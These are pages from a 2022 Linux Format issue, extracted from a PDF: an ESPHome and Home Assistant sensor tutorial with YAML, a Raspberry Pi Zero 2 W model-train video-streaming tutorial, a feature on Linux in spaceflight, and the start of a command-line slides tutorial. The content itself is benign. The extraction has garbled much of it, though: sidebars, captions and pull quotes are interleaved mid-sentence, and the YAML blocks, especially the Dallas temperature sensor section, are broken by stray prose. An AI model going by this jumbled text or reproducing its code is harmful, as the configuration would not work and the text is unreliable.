ways on ESP devices, the first being to install via the
command line. When compiled, the firmware file will be
downloaded, the ESP device plugged into a PC and the
ESPTool.py or ESPHome command-line executable used
to install on to the hardware.
Method two is carried out using a recent release of
www.linuxformat.com

Google Chrome. Support has been included to enable
devices to be flashed from a browser. To carry this out,
first compile and download the firmware, then visit
https://web.esphome.io/?dashboard_install. On this
page, the device can be selected and the firmware
flashed to the device. Once an initial firmware has been
included, further updates can be accomplished via
Wi-Fi. When ESPHome has detected the device is online
for the first time, further updates can be carried out
from the dashboard.
Once devices have the firmware installed and are
showing as online, Home Assistant will detect the data
flowing and will create entities, the data from which are
stored and can then be referenced. Data types include
sensors, which contain numerical data, such as
temperatures; binary_sensor, which contain true/false
information such as the state of a switch; light devices,
which enable LEDs on the microcontroller to be
switched on and off; and switch devices, which allow for
relays to be switched on and off via Home Assistant.
Switches and graph displays can easily be added to
Lovelace dashboards to allow for the generated
information to be displayed and acted upon. Because
Home Assistant registers data from ESPHome as entities,
they can be referenced in the same way as any other
registered devices or integrations.
An easy way to configure the microcontrollers is to
create a bare minimum firmware, upload to the device
and then use the over-the-air update method to add the
final functionality. While this is convenient, should the
firmware contain errors then the device will need to be
connected to a PC or Raspberry Pi, if that’s being used
to host Home Assistant and ESPHome.
Put theory into practice
With the theory described, let’s move on to create two
simple projects. The first will be to connect an LED to a
microcontroller board, which can be controlled from a
switch connected to the board as well as from a button
/automation in Home Assistant. In the second project
we’ll look at how to use a DS18B20 temperature sensor,
which uses the one-wire serial protocol to measure the
temperature of a room and this information can then be
fed back to Home Assistant. Using a smart plug and the
Generic Thermostat integration in Home Assistant, a
simple heating thermostat could be created (see www.
home-assistant.io/integrations/generic_thermostat).
For both of these projects the Wemos D1 Mini (see
image left) will be used. Two naming schemes exist to
describe the GPIO pins. Labels will be printed on the
board, such as D1, and this will correspond to another
number on the chip, such as GPIO 5.
For the first project a momentary switch will also
be used with an LED and a 1k ohm resistor, so that the
LED doesn’t become damaged by a higher voltage
than is required. For the second project a DS18B20
temperature sensor will be used as well as a 1k ohm
resistor. If using the temperature data to control a
heater of some sort, then a compatible smart plug will
be needed. These are available in the UK and US with
Tasmota pre-installed and is a much safer option than
flashing new firmware to existing devices. This is
USE OUR NOT-SO SMART SYSTEM Subscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
Home sensors TUTORIALS
This is the
because some require the devices to be opened, which breadboard layout
is a safety concern when mains voltages are involved. for our first project.
When designing projects it’s important to read the
datasheet relating to the board in question. With the D1
Mini, some pins are used at boot time, which could
either cause any outputs to flicker on and off while the
device is booting, or worse still, could cause the device
to fail to boot. For example, GPIO0/D3, if set to low (0V)
will cause the device to fail to boot. The table (overleaf)
shows the pins that may not be able to be used.
Now, let’s move on to create our project. Using a Excellent
documentation
multimeter set to resistance mode, determine which
is provided
pins of your momentary switch cause the resistance to
by the team
drop to nearly 0 ohms when the button is pressed. at ESPHome:
These two pins will be used with the microcontroller to https://
determine whether the switch is pressed or not. esphome.io.
Secondly, note that on LEDs, the longer leg is the anode
WHAT IS HOME ASSISTANT?
Home Assistant has been covered in some depth in the previous three
issues of Linux Format. For those who haven’t seen these articles, this
boxout will bring you up to date. www.home-assistant.io is a project
that makes it easy to integrate many different smart home products
or standards into a system that’s served from your home network.
Where possible data is kept within the network’s perimeter, but
integrations with many cloud platforms also exist. Home Assistant
provides ways to fire automations based on many different sources
of information, which can include when devices join the home’s Wi-Fi,
weather information from online sources, energy monitoring using
smart plugs, NFC tags being scanned and much more.
Dashboards can also be created to provide feedback from sensors
as well as ways to quickly and easily turn devices on and off. Getting
started is easy and images of the operating system, supervisor and
project itself are provided by the team and can be run on a Raspberry
Pi or various different virtualisation platforms. When using the OS,
which is provided by the team, the add-on store provides excellent
support for many additions, including SQL servers, DNS filtering for
the home and the WireGuard VPN.
July 2022 LXF290 47
 TUTORIALS Home sensors
Pin Number
D0 Pin is high at BOOT
Home Assistant
image files can D3 Boot failure if pulled LOW
be downloaded
D4 Pin is high on BOOT, boot failure if pulled LOW
from https://
www.home- D8 Boot failure if pulled HIGH
assistant.io/
installation. RX Pin is high at BOOT
TX Pin is high at BOOT, boot failure if pulled LOW
(that connects to positive voltages) and the shorter is
the cathode, which connects to zero volts via a resistor,
which is used to limit the voltage flowing through the
LED. D1 and D2 are good choices for this project.
Referring to the diagram (page 47), use jumper
cables and a breadboard to connect the anode of the
LED to D2 and the cathode of the LED to one end of the
resistor. The other end of the resistor should connect to
the 0V or ground pin (this pin may be labelled with
either text). Now the switch can be connected so that
one leg is connected to 0V. The second leg of the switch
should be connected to D1.
Now that the physical work has been completed,
we can move on to the ESPHome project. Open the
ESPHome dashboard and create a new project. When
asked, add the name for the project, details of the
network the microcontroller will connect to and the
type of board as Wemos D1 Mini.
Once the project has been created it can be
installed. Select the install option and the ‘Plug into
this computer’ method of installation. Download the
compiled file and then flash via a web browser (https://
web.esphome.io/?dashboard_install). This needs to be
a supported browser and Chrome works well. When the
firmware has been installed, the project will show as
being online from the ESPHome dashboard. Once this
has been done, the YAML can be edited accordingly and
further updates carried out via the wireless installation
method. The YAML below details the important part of
the project and the entire file can be downloaded from
github. (see link later in the article).
#Set up the LED on D2 as a light
The breadboard output:
layout for our
- platform: gpio
second project
with the added pin: D2
temperature id: ‘output_component1’
DS18B20 sensor.
48 LXF290 July 2022
Purpose
light:
- platform: binary
name: “Master Bedroom LED”
output: output_component1
#Set up the switch on GPIO D1
binary_sensor:
- platform: gpio
name: “Master Bedroom Switch”
pin:
number: D1
inverted: True
mode: INPUT_PULLUP
filters:
- delayed_off: 10ms
on_press:
- output.turn_on: output_component1
on_release:
- output.turn_off: output_component1
The first five lines define the D2 GPIO pin as an
output, and sets the name as output_component1 . The
next four lines define a light device, sets a name and
links this light to the output device previously defined.
The remaining lines define a binary sensor, which is an
input device and connects to the pin that the switch is
connected to. The line referencing the mode of PULL_
UP means that the input value will be set to 3.3V if the
switch isn’t pressed and then set to 0V when the switch
is pressed. This is important because it means that the
input won’t ”float” and the microcontroller won’t receive
incorrect values should the switch not be pressed.
The filters section adds a debounce feature so that
the microcontroller won’t register incorrect values when
the switch is being pressed down and sometimes the
value would fluctuate due to mechanical problems
within the switch. Finally in this section we define what
should happen if the switch is pressed. In this example
pressing the switch turns on the LED and releasing the
switch will switch the LED off again. As well as this
functionality existing on the microcontroller and
connected components, values of switch presses are
reported back to Home Assistant.
Once completed, save the file and select the option
to upload. Select the option to upgrade via wireless and
the firmware will then be flashed and within a minute or
so will be uploaded and the hardware should be visible
as online in the ESPHome dashboard. The next step is to
add the discovered automation to the Home Assistant
installation. Open the Configuration options and then
the Integrations page. At the top-left of the page there
should be a discovered integration. Select this and enter
the API password, which was set within the project (see
the downloaded YAML for a complete project). Once
added, new entities will be visible in the Integration for
www.linuxformat.com
 Home sensors TUTORIALS

this device (see screenshot, right) and automations can The data from the
microcontroller
be created using the information.
can be seen within
Because this is a simple project, from the Home Assistant
integrations page, select the device associated with and can be used
the ESPHome project and there will be an overview for dashboards
page displayed. This page will contain a switch that as well as
automations.
corresponds with the LED output on the microcontroller.
Selecting the switch will turn the LED on. Deselecting
the switch will turn it off again. An entity will also be
available for the physical switch on the microcontroller.
Selecting this will cause the LED to light, but also cause
the binary sensor in Home Assistant to change state.

Turning up (or down) the heat

The second project is to begin creating a thermostat to
control the temperature of a room by switching a smart
plug and connected heater on and off. Controlling the
smart plug is left as an exercise for the reader – a
similar project has been covered in a previous article.
Three stages are required for the microcontroller
section of the project, with the first being to connect
the temperature sensor to the microcontroller. For this,
connect the yellow cable, or middle pin if using the form
factor shown in the diagram (see far bottom left) of the
temperature sensor to D5 and then connect a resistor
between D5 and the 3.3V pin. The red wire (or right-
hand pin) of the temperature sensor then needs to
connect to 3.3V and the black wire (or left-hand pin) to
0V/Gnd. For stage two, add the following lines of YAML
to the bottom of the project file. Once saved the
firmware can be installed onto the board.
# Dallas Temperature Sensor uploaded a new entity will be created within Home
dallas: Assistant, which will contain the temperature. The
- pin: D5 complete YAML can be downloaded from github and
Now from the ESPHome dashboard select the log contains extra sensors as well to showcase what
option on the project and when the window opens and ESPHome can do (https://github.com/mattmole/
shows logs a string will be displayed, which looks similar LXF290/blob/main/ESPHome%20Project.yaml).
to a MAC address (if the string isn’t displayed, change We’ve only scratched the surface of what ESPHome
Substitutions
the log value from INFO to DEBUG). This value can be can be used to accomplish. This author has configured can be used with
copied and used when the below YAML is added to the sensors to read the temperature, barometric pressure the YAML so
project, which is stage 3. and humidity, and count the pulses from a smartmeter, that the same
# Individual sensors which enable whole-home energy consumption to be string can be
sensor: tracked without needing anything connected inline used in multiple
- platform: dallas with high voltages. locations
address: 0x1f0316c2ed45ff28 - REPLACE THIS WITH Micro-controllers can also be purchased for and YAML
WHAT WAS SEEN IN THE LOGS reasonable prices with e-Ink displays, OLED displays, can easily be
copied between
unit_of_measurement: “°C” built-in cameras and support is being worked on for
projects and
name: “NAME_OF_SENSOR” RISC-V powered devices. Let us know what you create
reused.
Now compile and upload the firmware again. When and what you’d like to see built next!

TASMOTA VS ESPHOME
Tasmota and ESPHome accomplish
largely the same task. Both projects
provide a means of running firmware on
some microcontroller devices that can be
controlled from the local network.
ESPHome originally used the MQTT
protocol to communicate between itself
and Home Assistant, but a number of
releases ago an API was developed to
provide more seamless communication
between the two projects. Configuration
within Tasmota is via a web GUI, whereas
ESPHome requires YAML syntax to be
written to create configurations, which
are then cross-compiled to run on the
microcontroller board.
Tasmota communicates with Home
Assistant via the MQTT protocol and is
capable of running in a completely
standalone manner, whereas ESPHome
requires some level of communication
with the ESPHome server component to
manage the devices. This central
management capability is useful because
it enables all devices to be updated at the
same time. Both products provide a
means to update the firmware via the
wireless network, which is convenient.
Overall, Tasmota is probably the easier
of the two systems to become familiar
with because it provides the web GUI,
while ESPHome is probably the more
adaptable project to use.

www.techradar.com/pro/linux July 2022 LXF290 49

 TUTORIALS Streaming video

VIDEO

Set your Pi for mobile

streaming video
Sean Conway helps you ride the rails with a Raspberry Pi and its camera,
with a bit of streaming video trickery thrown in for good measure.

ncorporating single-board computers into a

I hobby such as model railways is a great way

for a maker to double their pleasure by
combining their passions. In this tutorial, we’re going to
develop a Raspberry Pi camera system to produce a
OUR video from a moving HO scale model train.
The tutorial will introduce the latest Raspberry Pi
EXPERT Zero 2 W (PZ2W) and provide the configuration details
Sean Conway required to stream video from the camera-fitted Pi. We’ll
is a former IT also touch on the model rail cars.
security specialist The PZ2W is ideal for this project. Its small physical
from a national size fits nicely in the limited space of an HO-scale Here’s the cable harness that connects the external battery and
telecoms company model rail car. The quad-core processor packs enough power-off trigger switch to the Pi camera system.
who implements processing power to support streaming content. All
Pi-based train aboard? Then let’s get started. network connection and enable secure shell (ssh)
projects to get his support. raspi-config enables a user to configure
much-needed First stop: OS various settings of the operating system. The arrow
technology fix, now
We’re assuming that the reader knows how to install a keys enable you to navigate the menus to make any
that he’s retired.Raspberry Pi OS using the Raspberry Pi Imager software. changes. The tool removes the requirement to have
Users download the Pi OS image and after unzipping the in-depth knowledge to perform the changes from
the file, use Raspberry Pi Imager to install the OS a command line.
image to the microSD card. A video and support The Bullseye version of the OS comes pre-configured
documentation for the process is available on the with camera software. The new camera software stack
Raspberry Pi OS website. aims to support the camera system directly from the
This project uses the Raspberry Pi OS Lite software OS. The Broadcom GPU code was proprietary, which
image. The full version of Raspberry Pi OS with desktop restricted access. New open-source code software
and recommended software has lots of extras that drives the camera directly from the ARM processor.
aren’t required. Streaming video from the PZ2W to The libcamera software stack has five basic libcamera
another host over the wireless network is the goal. Why tools. The applications attempt to emulate most of the
use the larger image of the desktop functions of the legacy raspicam applications built on
YOU NEED OS with the additional software that Broadcom’s proprietary GPU code.
isn’t required, when the smaller Lite libcamera-jpeg: a simple still image capture application.
Raspberry Pi Zero 2W image works perfectly well? libcamera-still: expanded features for capturing still
Raspberry Pi OS Lite With the image transfered to the pictures. The tool supports several file formats.
32GB SD card SD card completed, install the card libcamera-vid: a video-capture application that makes
2.5A 5VDC PSU along with a keyboard and video use of H.264 encoding.
Pi V2.1 camera before starting the first boot. Before libcamera-raw: a raw frame capture application with
4,500mAmp/hr battery we proceed with camera “stuff”, let’s no formatting.
2.54mm single-row pin ensure the Raspberry Pi OS has all libcamera-detect: this application is trained to identify
header the latest updates by issuing sudo around 80 classes of objects using Coco database. It’s
2.54mm pitch straight six- apt update followed by sudo apt not supplied by default so it must be built.
position pin header connector upgrade from the command line. The OS provides a test command that starts the
Two HO-scale well cars Using the Raspberry Pi OS camera, outputs some details, and then displays a
Assorted model styrene configuration tool, change the Pi’s camera preview window for five seconds. From the
plastic hobby supplies configuration to establish a wireless command-line enter the following:

50 LXF290 July 2022 www.linuxformat.com


$ libcamera-hello
which is the equivalent of a “hello-world” application.
The screen will fill with camera-related details and
then display a preview window of the camera image. The
duration that the image is displayed can be altered from
the command line. The new camera software library
uses third-party libraries to interpret command-line
options. The options are chosen to reflect those used
in the legacy camera software.
The online camera documentation provides detailed
explanations and examples of use. The source code for
the software is available under a BSD 2 clause licence.
The goal is to enable users to customise libcamera-
based applications to suit their own requirements.
The libcamera-hello command generates an error
message if used from an ssh session connection. That
makes sense because the preview window can’t be
displayed over the connection. During the development
of the article, the author used the wrong screen to enter
commands. Discovering that the root cause of the error
message was pilot error and not hardware related was
embarrassing, to say the least.
Second stop: Config
In addition to the camera ribbon cable installation, the
rail car-riding PZ2W required some other connections
that are shown in the circuit diagram (left). With the
PZ2W installed in the HO-scale model well car, there
wasn’t sufficient space to gain access to the USB micro
B power connector. In order to provide DC power, the
battery power cable was connected to GPIO header pins
4 and 6. Pin 4 would normally output power. It can also
source power. In this use case pin 4-inputted power
from the battery pack carried in the trailing well car.
It’s never good practice to just turn the power off on
a Raspberry Pi without performing an orderly shutdown
of the operating system. The Off_Trigger button shown
in the diagram when pressed applies a ground to pin 15.
A Python script monitoring the pin takes care of the
shutdown sequence.
Section 2.8 Shutdown Button of the GPIO Zero
1.6.2 Documentation package (see https://gpiozero.
readthedocs.io/en/stable) has all the details required
to establish the Python script to perform the shutdown.
Two commands were used to set up the PiZero2W to
stream video to a host laptop. From the command line
on PZ2W enter the following:
$ libcamera-vid -t 0 --inline --listen -o tcp://<SERVER.
IP>:<PORT>
From the command line on a Ubuntu 18.04 laptop:
$ ffplay tcp://<SERVER.IP>:<PORT> -vf “setpts=N/30”
-fflags nobuffer -flags low_delay -framedrop
STREAM US TO YOUR DOORSTEP Subscribe now at http://bit.ly/LinuxFormat
www.techradar.com/pro/linux
Streaming video TUTORIALS
The angle bracketed IP address field will need to be A model well car
replaced with the appropriate IP used by the PiZero2W. provides sufficient
space to hold
After some connection negotiation information is
the Pi camera
displayed on the screen, a video window was presented system with a
to display the streaming content. external battery
An attempt was made to use some of the VLC pulled behind.
commands listed in the documentation with little
success. A week later a disclaimer on the camera
documentation website suggested a recent version of
VLC had problems with playback. They recommended
using ffplay, a software tool from the ffmpeg suite, until For all things
VLC resolves the issues. Raspberry Pi
The PZ2W with the camera was installed in one well Camera here
car and then enclosed in a hollowed-out container box is the official
to hide the installation. The battery pack was installed in manual link
a second well car and also enclosed in a hollowed-out https://bit.ly/
container box. A cable to carry power from the battery lxf290camera
to the camera system was also fitted.
There are two final real-world observations. The
streaming video on the laptop stuttered if both the
PZ2W and the laptop were using a wireless connection
to the same router. If the PiZero2W used wireless and
the laptop was hard-wired the streamed content
suffered no degradation. Second, with a fully charged
battery pack and the PZ2W streaming video, with a
laptop connected to display the stream, the PZ2W
camera system operated for 11 hours.
There you have it folks – a Raspberry Pi Zero 2 W
with a camera riding the rails on an HQ-scale model
train layout. Future improvements are pending, once a
new book on using ffmpeg to stream content arrives in
our virtual mailboxes. Hey, maybe there’s a future Linux
Format tutorial in that as well? Until next time keep your
Pi idea oven warm.
OUT WITH THE OLD, IN WITH THE NEW
Raspberry Pi is transitioning from a legacy camera software
stack based on proprietary Broadcom GPU code to an open-source
stack based on libcamera. The latest Raspberry Pi operating system
images named Bullseye and onward will contain only the libcamera-
based stack.
The Pi camera documentation site indicates it might be advisable
to stay with the older OS and the legacy Raspicam software stack
because it performs better on the Raspberry Pi Zero devices. The
software offloads more to the graphic processor unit and is less
dependent on the Arm cores.
Considering the Pi Zero 2W is hosting quad-cores the author
decided to ignore the recommendation and use the libcamera
software stack hosted in the OS to stream video.
July 2022 LXF290 51
LINUX
IN SPACE!
From a shaky start, Linux is becoming much more
established in astronautics. Mike Bedford looks at
its success to date and its future prospects.
hy do astronauts use Linux?
W Because you can’t open
Windows in space. Joking
aside, the truth is that the
heavens aren’t full of Linux-toting
computers. But all that’s changing,
so we’ll be looking at how Linux is
becoming an important facilitator in
space exploration. And that takes us
from NASA’s supercomputers here on
Earth, through to laptops in orbit on the
International Space Station (ISS) and
flight control computers on SpaceX’s
launch vehicles and spacecraft, to a
single board computer empowering a
helicopter flying on Mars.
As well as looking at where and how
Linux is used in astronautics, we’ll also
delve into why it’s used. The migration of
Linux into space is a recent phenomenon,
though, and it’s still far from universal. So,
we’ll also investigate what’s held Linux
back in space and, to a significant degree,
continues to do so today, and what the
prospects are for it to boldly go where no
operating system has gone before.
OSes beyond the Earth
We’re going to be looking at where Linux is
being used in space exploration. But first
we need to consider space-based
computing platforms and, in general
NASA’s upcoming Artemis programme, which
will use this SLS rocket, doesn’t have onboard
Linux machines, but back on Earth Linux is
critical to pre-launch simulations.
52 LXF290 July 2022
Credit: NASA
terms, how they’ve influenced the
operating system of choice.
Take, for example, the ISS, which was
launched over 20 years ago. With Linux
being the new kid on the block back then,
it wouldn’t have been given serious
consideration, and upgrading now would
barely be feasible. Much of the in-built
computer hardware wouldn’t support
modern distros, and upgrading the
hardware and software would be a costly
and high-risk strategy.
But even some much more recent
space missions have failed to embrace
Linux. The Perseverance Martian rover
touched down in February 2021 and it’ll
continue to explore the Red Planet for
quite some time yet. But its main onboard
computer uses a PowerPC 750 processor
– a chip that launched back in 1997.
Actually, to be rather more accurate, it
uses a variant of the 32-bit PowerPC 750
called the RAD750, and this brings us to a
key point. Processors don’t fare too well in
space. Because of the radiation they
constantly have to endure, they’re much
more likely to suffer occasional glitches,
or even catastrophic and permanent
failures, than their Earth-bound
cousins. For this reason, processors
www.linuxformat.com
 Linux in space! IN-DEPTH

used in space are usually radiation hardened to

withstand the rigours of life beyond Earth’s atmosphere.
These specialist processors aren’t cheap. Reportedly

Credit: NASA/JPL
RAD750s cost US$200,000 each – so we can barely
imagine how much they cost to develop.
The bottom line, therefore, is that manufacturers
bring out a new radiation-hardened chips infrequently,
and most chips never spawn a radiation-hardened
variant. This is a further reason for the antiquity of
computing hardware in space, and hence the scarcity of It might only have touched down in 2021, but the Perseverance Martian rover’s main processor is
Linux in the heavens. But things are changing here, as based on the venerable PowerPC 750 processor. No wonder it doesn’t run Linux.
we’ll see when we look at the so-called Spaceborne
supercomputer on the ISS. to experiment-specific applications and international
partners. Some of these are Windows and some are
In Earth orbit Linux of various distributions.”
Although much-reported stories suggest that all the Onboard the ISS are Honey, Queen and Bumble.
laptops on the ISS migrated to Linux back in 2013, Collectively, these free-flying robots form the Astrobee
reality is more nuanced, as we learned when we spoke system. Their job is to help astronauts reduce the time
to spoke to Dan Duncavage, system manager of NASA’s they spend on routine duties, leaving them to focus
ISS Avionics and Software Office. “As you can imagine, more on the things that only humans can do. NASA
the station contains many computational devices,” he

RUNNING LINUX ON THE ISS

told us. “Most of them are highly custom, and function
like avionics systems that you might find on an airliner

“A handful of the [Linux] laptops are

or military aircraft.” Although he didn’t specifically spell
it out, these mission-critical systems don’t employ

used by the crew as their command

Linux, but beyond these central systems, we find a more
varied situation, as he went on to explain.

interface to the core avionics systems.”

“There’s a subset of laptops and small computer
boxes where Linux is used. A handful of the laptops
are used by the crew as their command interface to
the core avionics systems. These are based on a
customised Linux kernel. The avionics interface and
crew user interface software are all purpose-built for
these functions, and resides on top of that Linux kernel.
“Additional laptops and IoT devices make up what’s
called the Station Support Computer (SSC) System.
This is similar to what businesses would call a mission-
critical IT infrastructure, and supports everything from
email to highly custom experiment interfaces and all of
the crew’s medical monitoring, and it runs the unique
space exercise equipment. The majority of the SSC
laptops are Windows 10 clients; the IOT devices are built
on Debian Linux. The remaining laptops are distributed
says, “The robots are designed to complete tasks such
as taking inventory, documenting experiments
conducted by astronauts with their built-in cameras, or
working together to move cargo throughout the station.
In addition, the system serves as a research platform
that can be outfitted and programmed to carry out
experiments in microgravity – helping us to learn more
about how robotics can benefit astronauts in space.”
And, yes, their control computers run Linux, specifically
two of their three ARM-based computers run Ubuntu/
ROS, while the third is equipped with Android 7.1.
So we’ve seen Linux-based laptops and flying robots
in Earth orbit, but a much more powerful Linux machine

GEARING UP THE RASPBERRY Pi FOR SPACE

An initiative of the European Space
Agency in collaboration with The
Raspberry Pi Foundation, Astro Pi is
providing teams of young coders with
the opportunity to see their applications
running aboard the International Space
Station, Python and the Linux Operating
safety of the astronauts who will use
them, the surface temperature of the
case couldn’t exceed 45 degrees. It also
had to have no sharp edges, and it had
to be proven that it wouldn’t interfere
with other equipment on the ISS, or
that such equipment would interfere
Lithuania, Latvia, or Malta, and winning
entries will be deployed in May 2022,
with the 2022/23 challenges launching
in September.
Credit: ESA/NASA

system. The Astro Pi platform comprises with the Astro Pi.

a RPi 4, a sensor HAT and a HQ Camera.
But it doesn’t look like any previous
Raspberry Pi-based platform, as you can
see in the photo.
Stringent testing was required before
the Astro Pi would be allowed aboard on
the ISS. First, it had to be capable of
withstanding the huge vibrations that
occur at lift-off. Then, to ensure the
Two of the latest generation of Astro
Pis were taken to the ISS in December
2021, to replace the previous Astro Pis
that had spent six years in orbit.
Following a test period by astronauts in
space, they’re ready to run student
Despite appearances, this Astro Pi, onboard the
programs. Entries were open to teams of ISS, contains Raspberry Pi hardware and provides
young people, aged 19 or under, from the opportunity for young people to see their code
ESA member states or Slovenia, Canada, working in orbit.

www.techradar.com/pro/linux July 2022 LXF290 53

 IN-DEPTH Linux in space!

was taken to the ISS in 2017 for a year-long mission.

Called the Spaceborne Computer, it’s been described as
a supercomputer and its purpose was to research
alternatives to the usual radiation hardening approach
for protecting computers from the hazards of radiation
exposure. This, it’s suggested, will pave the way to using
more up-to-date and higher performance processors
than are currently used, as would be required for future

long-term manned missions, for example to Mars.
The Spaceborne Computer is a commercially
available supercomputer designed and produced
by Hewlett Packard Enterprise (HPE). It includes
HPE Apollo 40-class systems with a high-speed
interconnect, running an open-source Linux operating
system. According to HPE, the Spaceborne Computer
contains compute nodes of the same class as Pleiades,
one of NASA’s premier supercomputers.
As an alternative to using radiation-hardened
processors, a software solution was developed to
mitigate negative impacts of radiation on reliability.
During high-radiation events, the electrical power
consumption and, therefore, the operating speed of
the computer system was lowered, with the aim of
determining if such systems can still operate. The
conclusion was favourable. During its demonstration
These floating mission, the Spaceborne Computer performed more
robots on the ISS than one trillion calculations per second (one teraflop)
form the Astrobee for 207 days without requiring a reset.
System. They
assist the crew
While we’ve not yet seen Linux employed in NASA’s
with basic tasks, mission-critical jobs, even that’s changing, and the ISS
and run Linux. is a beneficiary. Until it was retired in 2011, the Space
Credit: NASA/Shane Kimbrough.
Credit: NASA
Laptops onboard the ISS run a variety of operating systems, with Linux
empowering the crew’s interface to the core avionics systems.
Shuttle took astronauts and supplies to the ISS,
alongside the Russian Soyuz and a few other launch
vehicles. For a short while, America had to hitch a ride to
the ISS on the Russian launch vehicle, but then, in 2012,
the forces of capitalism came into play. Space was no
longer the sole domain of government-owned space
agencies. Now, the ISS is also supplied by launches by
SpaceX and Northrop Grumman Space Systems. And
the SpaceX Dragon spacecraft and its Falcon launch
vehicle are especially interesting.
Where NASA leads, SpaceX follows, you might think.
But that isn’t a valid assessment, and the choice of
operating systems is a case in point. For while NASA’s
forthcoming SLS launch vehicle uses a proprietary
Boeing operating system in its flight control computer,
and the Orion crew exploration vehicle uses a real-time
operating system called Integrity-178B from Green Hills
Software, it appears that SpaceX is firmly in the Linux
camp. But this is no ordinary Linux, and certainly not

any distro you might choose for your PC.

Although SpaceX declined to speak to us, and details
are sparse elsewhere, there’s consensus that the Falcon
9 launch vehicle uses a stripped-down version of Linux
running on x86 processors, and the flight control
software was written in C++.

Further afield
It would be great if we could tell you that a Linux-based
computer is on board the Pioneer 10 and 11 spacecraft,
which have now left the Solar System and are heading

SUPERCOMPUTING AND SPACE EXPLORATION

You’ll probably have noticed that NASA
is intent on returning astronauts to the
Moon for the first time since Apollo 17 in
1972. Called the Artemis programme, it’ll
be based on the Orion spacecraft that
will be launched atop the new Space
Launch System (SLS) rocket. But given
NASA’s apparent reluctance to use Linux
for mission-critical applications, it’ll
probably come as no surprise that Linux
doesn’t form a part of either Orion or
SLS. That doesn’t mean that the success
of Artemis won’t depend on Linux,
though – far from it.
Underpinning the design and
verification of all NASA’s spacecraft is
simulation, and Artemis is no exception.
It’s surely not surprising that these
simulations are hugely processor-
intensive, so some serious computing
muscle was called for. Simulations of the
landing process, for example, are being
carried out at NASA’s AMES Research
Center in California on a supercomputer
called Aitken. In November 2021, when it
boasted 242,688 cores, it was the
world’s 49th fastest computer, but it’s
been expanded since then. And,
needless to say, since the operating
system has powered all the world’s 500
fastest supercomputers since 2017, it
runs Linux.
If you want to learn more about why
Linux is the undisputed king of
supercomputing, be sure to take a look
at our expose in LXF284. If you’ll excuse
this spoiler, though, with commercial
top-end operating systems being
licenced per core, if you’ve got a quarter
of a million cores, FOSS is surely the way
to go, and such financial considerations
are just the tip of the iceberg.

54 LXF290 July 2022 www.linuxformat.com


for the stars. But we can’t. The first of these probes was
launched just four months after the launch of the first
ever microprocessor, Intel’s 4-bit 4004. Needless to say,
the Pioneers carried computers made from individual
logic chips that probably didn’t even have an operating
system. However, Linux can be found beyond the
confines of the Earth, about 278 million kilometres
beyond in fact, and it took over six months to get there.
The Jet Propulsion Laboratory in California is
responsible for NASA’s missions to Mars and beyond. To
get a view of the changing face of Linux in space
exploration, we spoke to Tim Canham, senior flight
software engineer at JPL who explained the motivators
and detractors to increasing the use of Linux in space.
First the success stories. “Linux has had two
prominent uses here at JPL recently: the Mars Ingenuity
helicopter and the Perseverance Rover EDL camera
system,” Tim was pleased to tell us. “Both systems were
considered technology demonstrations and weren’t
critical to the survival of the Rover, but Linux has
performed well in both cases.”
Given the fact that Linux is excluded from some
space projects because of the antiquity of the
computing hardware, one reason for its inclusion on
Ingenuity makes a refreshing change. The Martian
atmosphere is more than 100 times thinner than
Earth’s, and this places huge demands on the design of
an aircraft intended to fly on the planet. As well as
larger-than-usual rotors, keeping the weight to an
minimum was critical, and this brings us to the
computing hardware. An ARM-based Qualcomm
Snapdragon 801 based computer system was chosen to
meet these strict requirements and, yes, you’ve guessed
it, Linux was chosen because the VxWorks operating
system that would normally be used by NASA in such
applications wasn’t available for the Snapdragon chip.
So why are these applications the exception rather
than the rule? Except for the legacy nature of the
computing hardware often used in astronautics, what’s
held back the application of Linux? Tim suggested a few
reasons, starting with a concern about real-time
performance. “Flight software typically has hard
software deadlines that have to be met to guarantee the
survival of the spacecraft. If the operating system can’t
make guarantees that those deadlines can be met, it
can’t be used.
“Linux isn’t primarily designed as a real-time
operating system. Linux has real-time patches to the
mainline kernel that improves the performance, but it’s
Credit: www.rawpixel.com/image/2229601
SpaceX’s flight control computers aboard craft like this Crew Dragon
operate under Linux, in a marked departure from NASA’s approach.
www.techradar.com/pro/linux
Linux in space! IN-DEPTH
Credit: NASA/JPL/Caltech
Seen here
undergoing a final
inspection prior
to launch, the
Ingenuity drone
is now operating
on the Red Planet
thanks to its Linux-
based computer.
been problematic applying it to modified kernels that
are provided by board vendors. The fairness algorithm
and underlying I/O make it hard to guarantee timing.”
We can imagine that his second reason might cause
a few hackles to be raised, though. “Fair or not, there’s a
perception that since Linux is based on a lot of open
source contributions, it’s difficult to know or reasonably
assess the quality of the code that comprises the kernel,
drivers or other apps running in the distribution.”
But things are changing, as Tim explains. “The role of
Linux is still evolving and different organisations have
different risk postures related to usage, but I think for
NASA, Linux can find a niche in areas where it has
advantages: data processing and operation of fight
hardware in non-critical contexts. Linux brings
enormous open-source advantages that can speed
development and take advantage of software already
available in the community. I also think there’s a chance
to deploy Linux in a compute environment where
hypervisors can separate the real-time domain from the
processing domain.”
So while Linux hasn’t turned space exploration on its
head, changes are taking place. And you can take some
comfort in the fact that Ingenuity, the first aircraft ever
to fly above the surface of an alien world, is a Linux-
powered miracle of astronautical engineering.
INTRODUCING CUBESATS
Space exploration might have evolved to use commercial service
providers such as SpaceX, but further democratisation of space
research is just a pipe dream, you might think. But you’d be wrong.
CubeSats are tiny satellites, measuring just 100mm across and
weighing no more than 1.33kg. They can cost as little as £38,000
to build and, because they can be launched from the ISS or as a
secondary payload alongside more mainstream satellites, they can
be launched for not a lot more. As such, they’ve formed the basis of
student projects, often with funding from bodies like the ESA, and
have even been built by groups of enthusiasts – for example,
amateur radio societies.
Although Linux isn’t universal in CubeSats, given that the open
source philosophy is key to much of the CubeSat community, it’s
no surprise that Linux is a common choice, alongside the likes of
FreeRTOS. The open source approach goes well beyond the operating
system, and it isn’t even restricted to the software. Open hardware
processor boards are common. You can find designs for components
such as thrusters, and there have even been complete open source
satellites, including a design by the Libre Space Foundation. What’s
more, there are networks of open source satellite ground-stations
and, reportedly, if you have access to a 3D printer you can build your
own ground station for just a few hundred pounds.
July 2022 LXF290 55
TUTORIALS
TUTORIAL

SLIDES
Credit: https://github.com/maaslalani/slides

Making presentations
from the command line
Although renowned for concocting far better excuses than cocktails,
Shashank Sharma is quite adept at making presentations.

lides uses markdown language to create a navigate into the slides directory and then run the go

